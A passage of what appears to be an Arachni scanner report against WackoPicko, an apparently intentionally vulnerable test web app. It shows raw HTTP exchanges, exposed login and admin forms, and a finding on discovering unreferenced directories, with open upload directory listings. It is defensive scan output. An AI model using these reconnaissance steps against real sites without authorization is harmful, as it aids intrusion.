    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   <div class="column prepend-1 span-24 first last" >
<h2> Register for an account!</h2>
<p>
Protect yourself from hackers and <a href="/WackoPicko/passcheck.php">check your password strength</a>
</p>
<p class="span-10 error">
	 All fields are required</p>

      <table cellspacing="0" style="width:320px">
  <form action="/WackoPicko/users/register.php" method="POST">
  <tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
  <tr><td>First Name :</td><td> <input type="text" name="firstname" /></td></tr>
  <tr><td>Last Name :</td><td> <input type="text" name="lastname" /></td></tr>
  <tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
  <tr><td>Password again :</td><td> <input type="password" name="againpass" /></td></tr>
  <tr><td><input type="submit" value="Create Account!" /></td><td></td></tr>
</form>
</table>
</div>



       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
<form action="/WackoPicko/users/login.php" method="POST">
  <tr>
    <td>
      Username :
    </td>
    <td>
      <input type="text" name="username">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      Password :
    </td>
    <td>
      <input type="password" name="password">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      <input type="submit" value="login">
      </input>
    </td>
    <td>
      <a href="/WackoPicko/users/register.php">
        Register
      </a>
    </td>
  </tr>
</form>
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<form action="/WackoPicko/users/login.php" method="POST">
  <tr>
    <td>
      Username :
    </td>
    <td>
      <input type="text" name="username">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      Password :
    </td>
    <td>
      <input type="password" name="password">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      <input type="submit" value="login">
      </input>
    </td>
    <td>
      <a href="/WackoPicko/users/register.php">
        Register
      </a>
    </td>
  </tr>
</form>
Type In Action Default inputs Updated inputs
form http://192.168.0.26/WackoPicko/users/login.php http://192.168.0.26/WackoPicko/users/login.php
username
password
username
password
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/users/login.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 303 See Other
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /WackoPicko/users/login.php
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Content-Type: text/html

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 958
Content-Type: text/html

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-23 first last">
    <h2>Login</h2>
        <table style="width:320px" cellspacing="0">
      <form action="/WackoPicko/users/login.php" method="POST">
      <tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
      <tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
      <tr><td><input type="submit" value="login" /></td><td> <a href="/WackoPicko/users/register.php">Register</a></td></tr>
   </form>
 </table>
</div>
          <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/users/login.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 303 See Other
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /WackoPicko/users/login.php
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Content-Type: text/html

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 958
Content-Type: text/html

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-23 first last">
    <h2>Login</h2>
        <table style="width:320px" cellspacing="0">
      <form action="/WackoPicko/users/login.php" method="POST">
      <tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
      <tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
      <tr><td><input type="submit" value="login" /></td><td> <a href="/WackoPicko/users/register.php">Register</a></td></tr>
   </form>
 </table>
</div>
          <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
<form action="/WackoPicko/passcheck.php" method="POST">
  Password to check:
  <br>
  </br>
  <input type="password" name="password">
  </input>
  <br>
  </br>
  <input type="submit" value="Check!">
  </input>
</form>
0
1
2
3
4
5
6
7
8
9
10
<form action="/WackoPicko/passcheck.php" method="POST">
  Password to check:
  <br>
  </br>
  <input type="password" name="password">
  </input>
  <br>
  </br>
  <input type="submit" value="Check!">
  </input>
</form>
Type In Action Default inputs Updated inputs
form http://192.168.0.26/WackoPicko/passcheck.php http://192.168.0.26/WackoPicko/passcheck.php
password
password
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/passcheck.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=d5mejo5kr6efhtf1dlak7b04m1

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:55:10 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 910
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
<h2>Check your password strength</h2>
<form action="/WackoPicko/passcheck.php" method="POST">
   Password to check: <br>
   <input type="password" name="password" /><br>
   <input type="submit" value="Check!" />
</form>



</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/passcheck.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=d5mejo5kr6efhtf1dlak7b04m1

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:55:10 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 910
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
<h2>Check your password strength</h2>
<form action="/WackoPicko/passcheck.php" method="POST">
   Password to check: <br>
   <input type="password" name="password" /><br>
   <input type="submit" value="Check!" />
</form>



</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
<form action="/WackoPicko/admin/index.php?page=login" method="POST">
  Username :
  <input type="text" name="adminname">
  </input>
  <br>
  </br>
  Password :
  <input type="password" name="password">
  </input>
  <br>
  </br>
  <input type="submit" value="submit">
  </input>
</form>
0
1
2
3
4
5
6
7
8
9
10
11
12
13
<form action="/WackoPicko/admin/index.php?page=login" method="POST">
  Username :
  <input type="text" name="adminname">
  </input>
  <br>
  </br>
  Password :
  <input type="password" name="password">
  </input>
  <br>
  </br>
  <input type="submit" value="submit">
  </input>
</form>
Type In Action Default inputs Updated inputs
form http://192.168.0.26/WackoPicko/admin/index.php?page=login http://192.168.0.26/WackoPicko/admin/index.php?page=login
adminname
password
adminname
password
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/admin/index.php?page=login HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:44 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 186
Content-Type: text/html


   <h2>Admin Area</h2>
  <form action="/WackoPicko/admin/index.php?page=login" method="POST">
       Username : <input type="text" name="adminname" /><br>
       Password : <input type="password" name="password" /><br>
       <input type="submit" value="submit" />
   </form>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/admin/index.php?page=login HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:44 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 186
Content-Type: text/html


   <h2>Admin Area</h2>
  <form action="/WackoPicko/admin/index.php?page=login" method="POST">
       Username : <input type="text" name="adminname" /><br>
       Password : <input type="password" name="password" /><br>
       <input type="submit" value="submit" />
   </form>

Common directory 7 common_directories

Web applications are often made up of multiple files and directories.

It is possible that over time some directories may become unreferenced (unused) by the web application and forgotten about by the administrator/developer. Because web applications are built using common frameworks, they contain common directories that can be discovered (independent of server).

During the initial recon stages of an attack, cyber-criminals will attempt to locate unreferenced directories in the hope that the directory will assist in further compromise of the web application. To achieve this they will make thousands of requests using word lists containing common names. The response headers from the server will then indicate if the directory exists.

Arachni also contains a list of common directory names which it will attempt to access.

Remediation guidance

If directories are unreferenced then they should be removed from the web root and/or the application directory.

Preventing access without authentication may also be an option and can stop a client from being able to view the contents of a file, however it is still likely that the directory structure will be able to be discovered.

Using obscure directory names is implementing security through obscurity and is not a recommended option.

Proof
HTTP/1.1 200 OK
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/upload/testing/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:24 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 422
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /WackoPicko/upload/testing</title>
 </head>
 <body>
<h1>Index of /WackoPicko/upload/testing</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/WackoPicko/upload/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="again">again</a></td><td align="right">17-May-2011 21:25  </td><td align="right"> 47K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="gfhhg">gfhhg</a></td><td align="right">17-May-2011 21:25  </td><td align="right"> 47K</td><td>&nbsp;</td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/upload/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 580
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /WackoPicko/upload</title>
 </head>
 <body>
<h1>Index of /WackoPicko/upload</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/WackoPicko/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="3/">3/</a></td><td align="right">17-May-2011 21:25  </td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="againIxwsed">againIxwsed</a></td><td align="right">17-May-2011 21:25  </td><td align="right"> 47K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="againiJ42nH">againiJ42nH</a></td><td align="right">17-May-2011 21:25  </td><td align="right"> 47K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="doggie/">doggie/</a></td><td align="right">17-May-2011 21:25  </td><td align="right">  - </td><td>&nbsp;</td></tr>
